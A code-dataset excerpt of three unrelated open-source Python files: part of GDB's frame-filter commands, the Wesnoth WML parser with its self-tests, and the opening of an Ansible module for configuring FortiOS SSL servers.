NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(DisableFrameFilter, self).__init__("disable frame-filter",
gdb.COMMAND_DATA)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, True)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = _enable_parse_arg("disable frame-filter", arg)
_do_enable_frame_filter(command_tuple, False)
class SetFrameFilterPriority(gdb.Command):
"""GDB command to set the priority of the specified frame-filter.
Usage: set frame-filter priority DICTIONARY NAME PRIORITY
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame filter to operate on.
PRIORITY is the an integer to assign the new priority to the frame
filter."""
def __init__(self):
super(SetFrameFilterPriority, self).__init__("set frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a priority from a tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, name and priority from
the arguments.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
        argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc != 3:
print("set frame-filter priority " \
"takes exactly three arguments.")
return None
return argv
def _set_filter_priority(self, command_tuple):
"""Internal worker for setting priority of frame-filters, by
parsing a tuple and calling _set_priority with the parsed
tuple.
Arguments:
command_tuple: Tuple which contains the arguments from the
command.
"""
list_op = command_tuple[0]
frame_filter = command_tuple[1]
# GDB returns arguments as a string, so convert priority to
# a number.
priority = int(command_tuple[2])
op_list = gdb.frames.return_list(list_op)
try:
ff = op_list[frame_filter]
except KeyError:
msg = "frame-filter '" + str(frame_filter) + "' not found."
raise gdb.GdbError(msg)
gdb.frames.set_priority(ff, priority)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
        if command_tuple is not None:
self._set_filter_priority(command_tuple)
class ShowFrameFilterPriority(gdb.Command):
"""GDB command to show the priority of the specified frame-filter.
Usage: show frame-filter priority DICTIONARY NAME
DICTIONARY is the name of the frame filter dictionary on which to
operate. Named dictionaries are: "global" for the global frame
filter dictionary, "progspace" for the program space's framefilter
dictionary. If either of these two are not specified, the
dictionary name is assumed to be the name of an "objfile" -- a
shared library or an executable.
NAME matches the name of the frame-filter to operate on."""
def __init__(self):
super(ShowFrameFilterPriority, self).__init__("show frame-filter " \
"priority",
gdb.COMMAND_DATA)
def _parse_pri_arg(self, arg):
"""Internal worker to parse a dictionary and name from a
tuple.
Arguments:
arg: Tuple which contains the arguments from the command.
Returns:
A tuple containing the dictionary, and frame filter name.
Raises:
gdb.GdbError: An error parsing the arguments.
"""
        argv = gdb.string_to_argv(arg)
argc = len(argv)
if argc != 2:
print("show frame-filter priority " \
"takes exactly two arguments.")
return None
return argv
def get_filter_priority(self, frame_filters, name):
"""Worker for retrieving the priority of frame_filters.
Arguments:
frame_filters: Name of frame filter dictionary.
name: object to select printers.
Returns:
The priority of the frame filter.
Raises:
gdb.GdbError: A frame filter cannot be found.
"""
op_list = gdb.frames.return_list(frame_filters)
try:
ff = op_list[name]
except KeyError:
msg = "frame-filter '" + str(name) + "' not found."
raise gdb.GdbError(msg)
return gdb.frames.get_priority(ff)
def complete(self, text, word):
"""Completion function for both frame filter dictionary, and
frame filter name."""
if text.count(" ") == 0:
return _complete_frame_filter_list(text, word, False)
else:
            printer_list = gdb.frames.return_list(text.split()[0].rstrip())
return _complete_frame_filter_name(word, printer_list)
def invoke(self, arg, from_tty):
command_tuple = self._parse_pri_arg(arg)
        if command_tuple is None:
return
filter_name = command_tuple[1]
list_name = command_tuple[0]
try:
            priority = self.get_filter_priority(list_name, filter_name)
except Exception:
e = sys.exc_info()[1]
print("Error printing filter priority for '"+name+"':"+str(e))
else:
print("Priority of filter '" + filter_name + "' in list '" \
+ list_name + "' is: " + str(priority))
# Register commands
SetFilterPrefixCmd()
ShowFilterPrefixCmd()
InfoFrameFilter()
EnableFrameFilter()
DisableFrameFilter()
SetFrameFilterPriority()
ShowFrameFilterPriority()
| OpenSmalltalk/vm | processors/ARM/gdb-8.3.1/gdb/python/lib/gdb/command/frame_filters.py | Python | mit | 16,256 |
#!/usr/bin/env python3
# encoding: utf-8
"""
This parser uses the --preprocess option of wesnoth so a working
wesnoth executable must be available at runtime if the WML to parse
contains preprocessing directives.
Pure WML can be parsed as is.
For example:
wml = ""
[unit]
id=elve
name=Elve
[abilities]
[damage]
id=Ensnare
[/damage]
[/abilities]
[/unit]
""
p = Parser()
cfg = p.parse_text(wml)
for unit in cfg.get_all(tag = "unit"):
print(unit.get_text_val("id"))
print(unit.get_text_val("name"))
for abilities in unit.get_all(tag = "abilitities"):
for ability in abilities.get_all(tag = ""):
print(ability.get_name())
print(ability.get_text_val("id"))
Because no preprocessing is required, we did not have to pass the
location of the wesnoth executable to Parser.
The get_all method always returns a list over matching tags or
attributes.
The get_name method can be used to get the name and the get_text_val
method can be used to query the value of an attribute.
"""
import os, glob, sys, re, subprocess, argparse, tempfile, shutil
import atexit
tempdirs_to_clean = []
tmpfiles_to_clean = []
@atexit.register
def cleaner():
for temp_dir in tempdirs_to_clean:
shutil.rmtree(temp_dir, ignore_errors=True)
for temp_file in tmpfiles_to_clean:
os.remove(temp_file)
class WMLError(Exception):
"""
Catch this exception to retrieve the first error message from
the parser.
"""
def __init__(self, parser=None, message=None):
if parser:
self.line = parser.parser_line
self.wml_line = parser.last_wml_line
self.message = message
self.preprocessed = parser.preprocessed
def __str__(self):
return """WMLError:
%s %s
%s
%s
""" % (str(self.line), self.preprocessed, self.wml_line, self.message)
class StringNode:
"""
One part of an attribute's value. Because a single WML string
can be made from multiple translatable strings we model
it as a list of several StringNode each with its own text domain.
"""
def __init__(self, data: bytes):
self.textdomain = None # non-translatable by default
self.data = data
def wml(self) -> bytes:
if not self.data:
return b""
return self.data
def debug(self):
if self.textdomain:
return "_<%s>'%s'" % (self.textdomain,
self.data.decode("utf8", "ignore"))
else:
return "'%s'" % self.data.decode("utf8", "ignore")
def __str__(self):
return "StringNode({})".format(self.debug())
def __repr__(self):
return str(self)
class AttributeNode:
"""
A WML attribute. For example the "id=Elfish Archer" in:
[unit]
id=Elfish Archer
[/unit]
"""
def __init__(self, name, location=None):
self.name = name
self.location = location
self.value = [] # List of StringNode
def wml(self) -> bytes:
s = self.name + b"=\""
for v in self.value:
s += v.wml().replace(b"\"", b"\"\"")
s += b"\""
return s
def debug(self):
return self.name.decode("utf8") + "=" + " .. ".join(
[v.debug() for v in self.value])
def get_text(self, translation=None) -> str:
"""
Returns a text representation of the node's value. The
translation callback, if provided, will be called on each
partial string with the string and its corresponding textdomain
and the returned translation will be used.
"""
r = ""
for s in self.value:
ustr = s.data.decode("utf8", "ignore")
if translation:
r += translation(ustr, s.textdomain)
else:
r += ustr
return r
def get_binary(self):
"""
Returns the unmodified binary representation of the value.
"""
r = b""
for s in self.value:
r += s.data
return r
def get_name(self):
return self.name.decode("utf8")
def __str__(self):
return "AttributeNode({})".format(self.debug())
def __repr__(self):
return str(self)
class TagNode:
"""
A WML tag. For example the "unit" in this example:
[unit]
id=Elfish Archer
[/unit]
"""
def __init__(self, name, location=None):
self.name = name
self.location = location
# List of child elements, which are either of type TagNode or
# AttributeNode.
self.data = []
self.speedy_tags = {}
def wml(self) -> bytes:
"""
Returns a (binary) WML representation of the entire node.
All attribute values are enclosed in quotes and quotes are
escaped (as double quotes). Note that no other escaping is
performed (see the BinaryWML specification for additional
escaping you may require).
"""
s = b"[" + self.name + b"]\n"
for sub in self.data:
s += sub.wml() + b"\n"
s += b"[/" + self.name.lstrip(b'+') + b"]\n"
return s
def debug(self):
s = "[%s]\n" % self.name.decode("utf8")
for sub in self.data:
for subline in sub.debug().splitlines():
s += " %s\n" % subline
s += "[/%s]\n" % self.name.decode("utf8").lstrip('+')
return s
def get_all(self, **kw):
"""
This gets all child tags or child attributes of the tag.
For example:
[unit]
name=A
name=B
[attack]
[/attack]
[attack]
[/attack]
[/unit]
unit.get_all(att = "name")
will return two nodes for "name=A" and "name=B"
unit.get_all(tag = "attack")
will return two nodes for the two [attack] tags.
unit.get_all()
will return 4 nodes for all 4 sub-elements.
unit.get_all(att = "")
Will return the two attribute nodes.
unit.get_all(tag = "")
Will return the two tag nodes.
If no elements are found an empty list is returned.
"""
if len(kw) == 1 and "tag" in kw and kw["tag"]:
return self.speedy_tags.get(kw["tag"].encode("utf8"), [])
r = []
for sub in self.data:
ok = True
for k, v in list(kw.items()):
v = v.encode("utf8")
if k == "tag":
if not isinstance(sub, TagNode):
ok = False
elif v != b"" and sub.name != v:
ok = False
elif k == "att":
if not isinstance(sub, AttributeNode):
ok = False
elif v != b"" and sub.name != v:
ok = False
if ok:
r.append(sub)
return r
def get_text_val(self, name, default=None, translation=None, val=-1):
"""
Returns the value of the specified attribute. If the attribute
is given multiple times, the value number val is returned (default
behaviour being to return the last value). If the
attribute is not found, the default parameter is returned.
If a translation is specified, it should be a function which
when passed a unicode string and text-domain returns a
translation of the unicode string. The easiest way is to pass
it to gettext.translation if you have the binary message
catalogues loaded.
"""
x = self.get_all(att=name)
if not x: return default
return x[val].get_text(translation)
def get_binary(self, name, default=None):
"""
Returns the unmodified binary data for the first attribute
of the given name or the passed default value if it is not
found.
"""
x = self.get_all(att=name)
if not x: return default
return x[0].get_binary()
def append(self, node):
"""
Appends a child node (must be either a TagNode or
AttributeNode).
"""
self.data.append(node)
if isinstance(node, TagNode):
if node.name not in self.speedy_tags:
self.speedy_tags[node.name] = []
self.speedy_tags[node.name].append(node)
def get_name(self):
return self.name.decode("utf8")
def __str__(self):
return "TagNode({})".format(self.get_name())
def __repr__(self):
return str(self)
class RootNode(TagNode):
"""
The root node. There is exactly one such node.
"""
def __init__(self):
TagNode.__init__(self, None)
def debug(self):
s = ""
for sub in self.data:
for subline in sub.debug().splitlines():
s += subline + "\n"
return s
def __str__(self):
return "RootNode()"
def __repr__(self):
return str(self)
class Parser:
def __init__(self, wesnoth_exe=None, config_dir=None,
data_dir=None):
"""
wesnoth_exe - Wesnoth executable to use. This should have been
configured to use the desired data and config directories.
config_dir - The Wesnoth configuration directory, can be
None to use the wesnoth default.
data_dir - The Wesnoth data directory, can be None to use
the wesnoth default.
After parsing is done the root node of the result will be
in the root attribute.
"""
self.wesnoth_exe = wesnoth_exe
self.config_dir = None
if config_dir: self.config_dir = os.path.abspath(config_dir)
self.data_dir = None
if data_dir: self.data_dir = os.path.abspath(data_dir)
self.keep_temp_dir = None
self.temp_dir = None
self.no_preprocess = (wesnoth_exe is None)
self.preprocessed = None
self.verbose = False
self.last_wml_line = "?"
self.parser_line = 0
self.line_in_file = 42424242
self.chunk_start = "?"
def parse_file(self, path, defines="") -> RootNode:
"""
Parse the given file found under path.
"""
self.path = path
if not self.no_preprocess:
self.preprocess(defines)
return self.parse()
def parse_binary(self, binary: bytes, defines="") -> RootNode:
"""
Parse a chunk of binary WML.
"""
td, tmpfilePath = tempfile.mkstemp(prefix="wmlparser_",
suffix=".cfg")
with open(tmpfilePath, 'wb') as temp:
temp.write(binary)
os.close(td)
self.path = tmpfilePath
tmpfiles_to_clean.append(tmpfilePath)
if not self.no_preprocess:
self.preprocess(defines)
return self.parse()
def parse_text(self, text, defines="") -> RootNode:
"""
Parse a text string.
"""
return self.parse_binary(text.encode("utf8"), defines)
def preprocess(self, defines):
"""
This is called by the parse functions to preprocess the
input from a normal WML .cfg file into a preprocessed
.plain file.
"""
if self.keep_temp_dir:
output = self.keep_temp_dir
else:
output = tempfile.mkdtemp(prefix="wmlparser_")
tempdirs_to_clean.append(output)
self.temp_dir = output
commandline = [self.wesnoth_exe]
if self.data_dir:
commandline += ["--data-dir", self.data_dir]
if self.config_dir:
commandline += ["--config-dir", self.config_dir]
commandline += ["--preprocess", self.path, output]
if defines:
commandline += ["--preprocess-defines", defines]
if self.verbose:
print((" ".join(commandline)))
p = subprocess.Popen(commandline,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if self.verbose:
print((out + err).decode("utf8"))
self.preprocessed = output + "/" + os.path.basename(self.path) + \
".plain"
if not os.path.exists(self.preprocessed):
first_line = open(self.path).readline().strip()
raise WMLError(self, "Preprocessor error:\n" +
" ".join(commandline) + "\n" +
"First line: " + first_line + "\n" +
out.decode("utf8") +
err.decode("utf8"))
    def parse_line_without_commands_loop(self, line: bytes) -> bytes:
"""
Once the .plain commands are handled WML lines are passed to
this.
"""
if not line: return
if line.strip():
self.skip_newlines_after_plus = False
if self.in_tag:
self.handle_tag(line)
return
if self.in_arrows:
arrows = line.find(b'>>')
if arrows >= 0:
self.in_arrows = False
self.temp_string += line[:arrows]
self.temp_string_node = StringNode(self.temp_string)
self.temp_string = b""
self.temp_key_nodes[self.commas].value.append(
self.temp_string_node)
return line[arrows + 2:]
else:
self.temp_string += line
return
quote = line.find(b'"')
if not self.in_string:
arrows = line.find(b'<<')
if arrows >= 0 and (quote < 0 or quote > arrows):
self.parse_line_without_commands(line[:arrows])
self.in_arrows = True
return line[arrows + 2:]
if quote >= 0:
if self.in_string:
# double quote
if quote < len(line) - 1 and line[quote + 1] == b'"'[0]:
self.temp_string += line[:quote + 1]
return line[quote + 2:]
self.temp_string += line[:quote]
self.temp_string_node = StringNode(self.temp_string)
if self.translatable:
self.temp_string_node.textdomain = self.textdomain
self.translatable = False
self.temp_string = b""
if not self.temp_key_nodes:
raise WMLError(self, "Unexpected string value.")
self.temp_key_nodes[self.commas].value.append(
self.temp_string_node)
self.in_string = False
return line[quote + 1:]
else:
self.parse_outside_strings(line[:quote])
self.in_string = True
return line[quote + 1:]
else:
if self.in_string:
self.temp_string += line
else:
self.parse_outside_strings(line)
def parse_line_without_commands(self, line):
while True:
line = self.parse_line_without_commands_loop(line)
if not line:
break
def parse_outside_strings(self, line):
"""
Parse a WML fragment outside of strings.
"""
if not line: return
if line.lstrip(b" \t").startswith(b"#textdomain "):
self.textdomain = line.lstrip(b" \t")[12:].strip().decode("utf8")
return
if not self.temp_key_nodes:
line = line.lstrip()
if not line: return
# Is it a tag?
if line.startswith(b"["):
self.handle_tag(line)
# No tag, must be an attribute.
else:
self.handle_attribute(line)
else:
for i, segment in enumerate(line.split(b"+")):
segment = segment.lstrip(b" \t")
if i > 0:
# If the last segment is empty (there was a plus sign
# at the end) we need to skip newlines.
self.skip_newlines_after_plus = not segment.strip()
if not segment: continue
if segment.rstrip(b" ") == b"_":
self.translatable = True
segment = segment[1:].lstrip(b" ")
if not segment: continue
self.handle_value(segment)
def handle_tag(self, line):
end = line.find(b"]")
if end < 0:
if line.endswith(b"\n"):
raise WMLError(self, "Expected closing bracket.")
self.in_tag += line
return
tag = (self.in_tag + line[:end])[1:]
self.in_tag = b""
if tag.startswith(b"/"):
self.parent_node = self.parent_node[:-1]
elif tag.startswith(b"+") and self.parent_node and self.parent_node[-1].get_all(tag=tag[1:].decode()):
node_to_append_to = self.parent_node[-1].get_all(tag=tag[1:].decode())[-1]
self.parent_node.append(node_to_append_to)
else:
node = TagNode(tag, location=(self.line_in_file, self.chunk_start))
if self.parent_node:
self.parent_node[-1].append(node)
self.parent_node.append(node)
self.parse_outside_strings(line[end + 1:])
def handle_attribute(self, line):
assign = line.find(b"=")
remainder = None
if assign >= 0:
remainder = line[assign + 1:]
line = line[:assign]
self.commas = 0
self.temp_key_nodes = []
for att in line.split(b","):
att = att.strip()
node = AttributeNode(att, location=(self.line_in_file, self.chunk_start))
self.temp_key_nodes.append(node)
if self.parent_node:
self.parent_node[-1].append(node)
if remainder:
self.parse_outside_strings(remainder)
def handle_value(self, segment):
def add_text(segment):
segment = segment.rstrip()
if not segment: return
n = len(self.temp_key_nodes)
maxsplit = n - self.commas - 1
if maxsplit < 0: maxsplit = 0
for subsegment in segment.split(b",", maxsplit):
self.temp_string += subsegment.strip()
self.temp_string_node = StringNode(self.temp_string)
self.temp_string = b""
self.temp_key_nodes[self.commas].value.append(
self.temp_string_node)
if self.commas < n - 1:
self.commas += 1
# Finish assignment on newline, except if there is a
# plus sign before the newline.
add_text(segment)
if segment.endswith(b"\n") and not self.skip_newlines_after_plus:
self.temp_key_nodes = []
def parse(self) -> RootNode:
"""
Parse preprocessed WML into a tree of tags and attributes.
"""
# parsing state
self.temp_string = b""
self.temp_string_node = None
self.commas = 0
self.temp_key_nodes = []
self.in_string = False
self.in_arrows = False
self.textdomain = "wesnoth"
self.translatable = False
self.root = RootNode()
self.parent_node = [self.root]
self.skip_newlines_after_plus = False
self.in_tag = b""
command_marker_byte = bytes([254])
input = self.preprocessed
if not input: input = self.path
for rawline in open(input, "rb"):
compos = rawline.find(command_marker_byte)
self.parser_line += 1
# Everything from chr(254) to newline is the command.
if compos != 0:
self.line_in_file += 1
if compos >= 0:
self.parse_line_without_commands(rawline[:compos])
self.handle_command(rawline[compos + 1:-1])
else:
self.parse_line_without_commands(rawline)
if self.keep_temp_dir is None and self.temp_dir:
if self.verbose:
print(("removing " + self.temp_dir))
shutil.rmtree(self.temp_dir, ignore_errors=True)
return self.root
def handle_command(self, com):
if com.startswith(b"line "):
self.last_wml_line = com[5:]
_ = self.last_wml_line.split(b" ")
self.chunk_start = [(_[i + 1], int(_[i])) for i in range(0, len(_), 2)]
self.line_in_file = self.chunk_start[0][1]
elif com.startswith(b"textdomain "):
self.textdomain = com[11:].decode("utf8")
else:
raise WMLError(self, "Unknown parser command: " + com)
def get_all(self, **kw):
return self.root.get_all(**kw)
def get_text_val(self, name, default=None, translation=None):
return self.root.get_text_val(name, default, translation)
def jsonify(tree, verbose=False, depth=1):
"""
Convert a Parser tree into JSON
If verbose, insert a linebreak after every brace and comma (put every
item on its own line), otherwise, condense everything into a single line.
"""
import json
def node_to_dict(n):
d = {}
tags = set(x.get_name() for x in n.get_all(tag=""))
for tag in tags:
d[tag] = [node_to_dict(x) for x in n.get_all(tag=tag)]
for att in n.get_all(att=""):
d[att.get_name()] = att.get_text()
return d
print(json.dumps(node_to_dict(tree), indent=depth if verbose else None))
def xmlify(tree, verbose=False, depth=0):
import xml.etree.ElementTree as ET
def node_to_et(n):
et = ET.Element(n.get_name())
for att in n.get_all(att=""):
attel = ET.Element(att.get_name())
attel.text = att.get_text()
et.append(attel)
for tag in n.get_all(tag=""):
et.append(node_to_et(tag))
return et
ET.ElementTree(node_to_et(tree.get_all()[0])).write(
sys.stdout, encoding="unicode")
if __name__ == "__main__":
arg = argparse.ArgumentParser()
arg.add_argument("-a", "--data-dir", help="directly passed on to wesnoth.exe")
arg.add_argument("-c", "--config-dir", help="directly passed on to wesnoth.exe")
arg.add_argument("-i", "--input", help="a WML file to parse")
arg.add_argument("-k", "--keep-temp", help="specify directory where to keep temp files")
arg.add_argument("-t", "--text", help="WML text to parse")
arg.add_argument("-w", "--wesnoth", help="path to wesnoth.exe")
arg.add_argument("-d", "--defines", help="comma separated list of WML defines")
arg.add_argument("-T", "--test", action="store_true")
arg.add_argument("-j", "--to-json", action="store_true")
arg.add_argument("-v", "--verbose", action="store_true")
arg.add_argument("-x", "--to-xml", action="store_true")
args = arg.parse_args()
if not args.input and not args.text and not args.test:
sys.stderr.write("No input given. Use -h for help.\n")
sys.exit(1)
if (args.wesnoth and not os.path.exists(args.wesnoth)):
sys.stderr.write("Wesnoth executable not found.\n")
sys.exit(1)
if not args.wesnoth:
print("Warning: Without the -w option WML is not preprocessed!",
file=sys.stderr)
if args.test:
print("Running tests")
p = Parser(args.wesnoth, args.config_dir,
args.data_dir)
if args.keep_temp:
p.keep_temp_dir = args.keep_temp
if args.verbose: p.verbose = True
only = None
def test2(input, expected, note, function):
if only and note != only: return
input = input.strip()
expected = expected.strip()
p.parse_text(input)
output = function(p).strip()
if output != expected:
print("__________")
print(("FAILED " + note))
print("INPUT:")
print(input)
print("OUTPUT:")
print(output)
print("EXPECTED:")
print(expected)
print("__________")
else:
print(("PASSED " + note))
def test(input, expected, note):
test2(input, expected, note, lambda p: p.root.debug())
def test_with_preprocessor(input, expected, note):
if not args.wesnoth:
print("SKIPPED WITHOUT PREPROCESSOR " + note)
return
test(input, expected, note)
test(
"""
[test]
a=1
[/test]
""", """
[test]
a='1'
[/test]
""", "simple")
test(
"""
[+foo]
a=1
[/foo]
""", """
[+foo]
a='1'
[/foo]
""", "+foo without foo in toplevel")
test(
"""
[foo]
[+bar]
a=1
[/bar]
[/foo]
""", """
[foo]
[+bar]
a='1'
[/bar]
[/foo]
""", "+foo without foo in child")
test(
"""
[test]
[foo]
a=1
[/foo]
[/test]
""", """
[test]
[foo]
a='1'
[/foo]
[/test]
""", "subtag, part 1")
test(
"""
[test]
[foo]
a=1
[/foo]
[/test]
[+test]
[+foo]
[/foo]
[/test]
""", """
[test]
[foo]
a='1'
[/foo]
[/test]
""", "subtag, part 2")
test(
"""
[test]
a, b, c = 1, 2, 3
[/test]
""", """
[test]
a='1'
b='2'
c='3'
[/test]
""", "multi assign")
test(
"""
[test]
a, b = 1, 2, 3
[/test]
""", """
[test]
a='1'
b='2, 3'
[/test]
""", "multi assign 2")
test(
"""
[test]
a, b, c = 1, 2
[/test]
""", """
[test]
a='1'
b='2'
c=
[/test]
""", "multi assign 3")
test_with_preprocessor(
"""
#textdomain A
#define X
_ "abc"
#enddef
#textdomain B
[test]
x = _ "abc" + {X}
[/test]
""", """
[test]
x=_<B>'abc' .. _<A>'abc'
[/test]
""", "textdomain")
test(
"""
[test]
x,y = _1,_2
[/test]
""", """
[test]
x='_1'
y='_2'
[/test]
""", "underscores")
test(
"""
[test]
a = "a ""quoted"" word"
[/test]
""",
"""
[test]
a='a "quoted" word'
[/test]
""", "quoted")
test(
"""
[test]
code = <<
"quotes" here
""blah""
>>
[/test]
""",
"""
[test]
code='
"quotes" here
""blah""
'
[/test]
""", "quoted2")
test(
"""
foo="bar"+
"baz"
""",
"""
foo='bar' .. 'baz'
""", "multi line string")
test_with_preprocessor(
"""
#define baz
"baz"
#enddef
foo="bar"+{baz}
""",
"""
foo='bar' .. 'baz'
""", "defined multi line string")
test_with_preprocessor(
"""
foo="bar" + "baz" # blah
""",
"""
foo='bar' .. 'baz'
""", "comment after +")
test_with_preprocessor(
"""
#define baz
"baz"
#enddef
foo="bar" {baz}
""",
"""
foo='bar' .. 'baz'
""", "defined string concatenation")
test_with_preprocessor(
"""
#define A BLOCK
[{BLOCK}]
[/{BLOCK}]
#enddef
{A blah}
""",
"""
[blah]
[/blah]
""", "defined tag")
test2(
"""
[test]
a=1
b=2
a=3
b=4
[/test]
""", "3, 4", "multiatt",
lambda p:
p.get_all(tag = "test")[0].get_text_val("a") + ", " +
p.get_all(tag = "test")[0].get_text_val("b"))
sys.exit(0)
p = Parser(args.wesnoth, args.config_dir, args.data_dir)
if args.keep_temp:
p.keep_temp_dir = args.keep_temp
if args.verbose: p.verbose = True
if args.input:
p.parse_file(args.input, args.defines)
elif args.text:
p.parse_text(args.text, args.defines)
if args.to_json:
jsonify(p.root, True)
print()
elif args.to_xml:
print('<?xml version="1.0" encoding="UTF-8" ?>')
print('<root>')
xmlify(p.root, True, 1)
print('</root>')
else:
print((p.root.debug()))
| spixi/wesnoth | data/tools/wesnoth/wmlparser3.py | Python | gpl-2.0 | 27,879 |
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_firewall_ssl_server
short_description: Configure SSL servers in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify firewall feature and ssl_server category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
version_added: 2.9
state:
description:
- Indicates whether to create or remove the object.
This attribute was present already in previous version in a deeper level.
It has been moved out to this outer level.
type: str
required: false
choices:
- present
- absent
version_added: 2.9
firewall_ssl_server:
description:
- Configure SSL servers.
default: null
type: dict
suboptions:
state:
description:
- B(Deprecated)
- Starting with Ansible 2.9 we recommend using the top-level 'state' parameter.
- HORIZONTALLINE
- Indicates whether to create or remove the object.
type: str
required: false
choices:
- present
- absent
add_header_x_forwarded_proto:
description:
- Enable/disable adding an X-Forwarded-Proto header to forwarded requests.
type: str
choices:
- enable
- disable
ip:
description:
- IPv4 address of the SSL server.
type: str
mapped_port:
description:
- Mapped server service port (1 - 65535).
type: int
name:
description:
- Server name.
required: true
type: str
port:
description:
- Server service port (1 - 65535).
type: int
ssl_algorithm:
description:
- Relative strength of encryption algorithms accepted in negotiation.
type: str
choices:
- high
- medium
- low
ssl_cert:
description:
- Name of certificate for SSL connections to this server. Source vpn.certificate.local.name.
type: str
ssl_client_renegotiation:
description:
- Allow or block client renegotiation by server.
type: str
choices:
- allow
- deny
- secure
ssl_dh_bits:
description:
- Bit-size of Diffie-Hellman (DH) prime used in DHE-RSA negotiation.
type: str
choices:
- 768
- 1024
- 1536
- 2048
ssl_max_version:
description:
- Highest SSL/TLS version to negotiate.
type: str
choices:
- tls-1.0
- tls-1.1
- tls-1.2
ssl_min_version:
description:
- Lowest SSL/TLS version to negotiate.
type: str
choices:
- tls-1.0
- tls-1.1
- tls-1.2
ssl_mode:
description:
- SSL/TLS mode for encryption and decryption of traffic.
type: str
choices:
- half
- full
ssl_send_empty_frags:
description:
- Enable/disable sending empty fragments to avoid attack on CBC IV.
type: str
choices:
- enable
- disable
url_rewrite:
description:
- Enable/disable rewriting the URL.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure SSL servers.
fortios_firewall_ssl_server:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
state: "present"
firewall_ssl_server:
add_header_x_forwarded_proto: "enable"
ip: "<your_own_value>"
mapped_port: "5"
name: "default_name_6"
port: "7"
ssl_algorithm: "high"
ssl_cert: "<your_own_value> (source vpn.certificate.local.name)"
ssl_client_renegotiation: "allow"
ssl_dh_bits: "768"
ssl_max_version: "tls-1.0"
ssl_min_version: "tls-1.0"
ssl_mode: "half"
ssl_send_empty_frags: "enable"
url_rewrite: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
ssl_verify = data['ssl_verify']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password, verify=ssl_verify)
def filter_firewall_ssl_server_data(json):
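    # Keep only keys known to the firewall/ssl-server endpoint and drop
    # unset (None) values so they are not sent to the device.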
option_list = ['add_header_x_forwarded_proto', 'ip', 'mapped_port',
'name', 'port', 'ssl_algorithm',
'ssl_cert', 'ssl_client_renegotiation', 'ssl_dh_bits',
'ssl_max_version', 'ssl_min_version', 'ssl_mode',
'ssl_send_empty_frags', 'url_rewrite']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
def underscore_to_hyphen(data):
